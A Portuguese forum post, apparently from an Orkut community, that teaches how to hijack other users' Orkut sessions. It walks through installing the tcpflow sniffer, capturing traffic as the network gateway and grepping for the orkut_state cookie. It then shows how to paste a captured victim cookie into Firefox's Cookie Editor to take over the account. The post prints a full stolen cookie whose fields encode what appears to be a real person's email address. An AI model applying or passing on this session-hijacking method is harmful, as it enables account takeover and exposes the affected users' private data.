Estamos seguros no orkut?

Sou muito curioso na área de segurança e acabei descobrindo algo interessante. Muitos membros aqui já brincaram um pouco de hacker, pois bem, estou postando um tutorial que explora uma falha do Orkut. Espero que o Orkut resolva mais este bug...

Instalando o tcpflow (Sniffer)

Primeiramente iremos instalar um analisador de tráfego, o famoso tcpflow. Para quem nunca utilizou, peço que dê uma olhadinha no site:

• http://www.circlemud.org/~jelson/software/tcpflow/

Instale ou baixe o pacote já pronto.

CentOS:

# yum install tcpflow

Debian:

# apt-get install tcpflow

Slackware:

# wget http://linuxpackages.inode.at/Slackware-12.0/Console/tcpflow/tcpflow-0.21-i486-1kan.tgz
# installpkg tcpflow-0.21-i486-1kan.tgz

:D

Sniffando rede Orkut

Bem, primeiramente precisamos ser o gateway da rede para analisarmos o tráfego pelo tcpflow. Segue o comando:

# tcpflow -i eth1 host www.orkut.com.br 

No parâmetro acima pegamos todo o tráfego do domínio orkut.com.br. Deixe rodando por 3 minutos e finalize.

Digite:

# cat * | grep orkut_state

Ira aparecer uma lista enorme com vários caractere... Procure pelo cookie chamado orkut_state.

ORKUTPREF=ID=6914954405945645074:INF=0:SET=100914668:LNG=79:CNT=29:RM=0: USR=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:PHS=:TS=1282577740:LCL=pt-BR:NET=1: TOS=1:GC=DQAAAHIAAAAsa6oFoD3EKn3oIzN--Fzws- cc75k1Qa7PrlMECdkJGiCHV2qc7C3ph4YVLX5CSJj3aotEVvwC6FVJZThZNNdLGBYuCiLgIcO YJqDG3ZMWY8daMYFnBc1YOUJ01JnvURpln3xe1C4QMVW9uIHiYJL3nQvYyoe6jRElQ4K7doNxjg: PE=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:GTI=0:GID=:VER=3:AST=0:SID=0: GI=9185043685642045981:GTM=0:FSA=2:CU=1:GU=0:S=L+ByKo9nnXtXzT/Qr+HiO4xFhr0=:; S=neworkut_borg=Ylnxv34anNBdLiHANiD5Vg; OSN=ID=FE6rpebB8Zs=:S=sR9V6nHRSjxLiNw0:

O início tem que ser ORKUTPREF e o final S=sR9V6nHRSjxLiNw0:.

Este cookie contém todas as informações necessárias para capturar a sessão do usuário. Vou ensinar como pegar este arquivo e capturar a sessão.

:D

Utilizando o cookie

Primeiro você deve ter o Mozilla Firefox:

• http://baixaki.ig.com.br/download/Mozilla-FireFox-2-0-0-3.htm

E o editor de cookies do Firefox:

• https://addons.mozilla.org/en-US/firefox/addon/573

Agora você vai em ferramentas/Cookie Editor e adicione o seguinte cookie:

• Name: orkut_state
• Content: Cole o cookie da vitima "ORKUTPREF=ID=", ex.:
  
  ORKUTPREF=ID=6914954405945645074:INF=0:SET=100914668:LNG=79:CNT=29:RM=0: USR=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:PHS=:TS=1282577740:LCL=pt-BR:NET=1: TOS=1:GC=DQAAAHIAAAAsa6oFoD3EKn3oIzN--Fzws- cc75k1Qa7PrlMECdkJGiCHV2qc7C3ph4YVLX5CSJj3aotEVvwC6FVJZThZNNdLGBYuCiLgIcO YJqDG3ZMWY8daMYFnBc1YOUJ01JnvURpln3xe1C4QMVW9uIHiYJL3nQvYyoe6jRElQ4K7doNxjg: PE=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:GTI=0:GID=:VER=3:AST=0:SID=0: GI=9185043685642045981:GTM=0:FSA=2:CU=1:GU=0:S=L+ByKo9nnXtXzT/Qr+HiO4xFhr0=:; S=neworkut_borg=Ylnxv34anNBdLiHANiD5Vg; OSN=ID=FE6rpebB8Zs=:S=sR9V6nHRSjxLiNw0:
  
• Domain: www.orkut.com.br
• Path: /
• Never Expires

Abra o site:

• http://www.orkut.com.br/Main#Home

E pronto... está utilizando a sessão do cara.

Interessante, mas tomem cuidado.

valmeida@idea-planejamento.com